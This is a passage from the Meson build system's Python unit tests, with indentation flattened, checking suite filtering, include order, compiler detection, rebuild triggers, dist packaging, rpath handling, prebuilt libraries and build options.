self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somfxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# target private dir
someexe_id = Target.construct_id_from_path("sub4", "someexe", "@exe")
self.assertPathEqual(incs[0], "-I" + os.path.join("sub4", someexe_id))
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
self.assertPathEqual(incs[0], '-Isomefxe@exe')
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'.format(define)
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files such as mtime do not cause
a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
# Changing mtime of libefile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def test_dist_hg(self):
if not shutil.which('hg'):
raise unittest.SkipTest('Mercurial not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}')".format(name))
return path
def dist_impl(self, vcs_init, include_subprojects=True):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']),
sorted(z.namelist()))
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/subprojects/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c',
'disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/meson.build']),
sorted(z.namelist()))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.forbidden_target_names
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile]
else:
link_cmd = ['ar', 'csr', outfile, objectfile]
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
Test that the we prefer static libraries when `static: true` is
passed to dependency() with pkg-config. Can't be an ordinary test
because we need to build libs and try to find them from meson.build
Also test that it's not a hard error to have unsatisfiable library deps
since system libraries -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix()]
self.assertEqual(foo_dep.get_compile_args(), cargs)
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
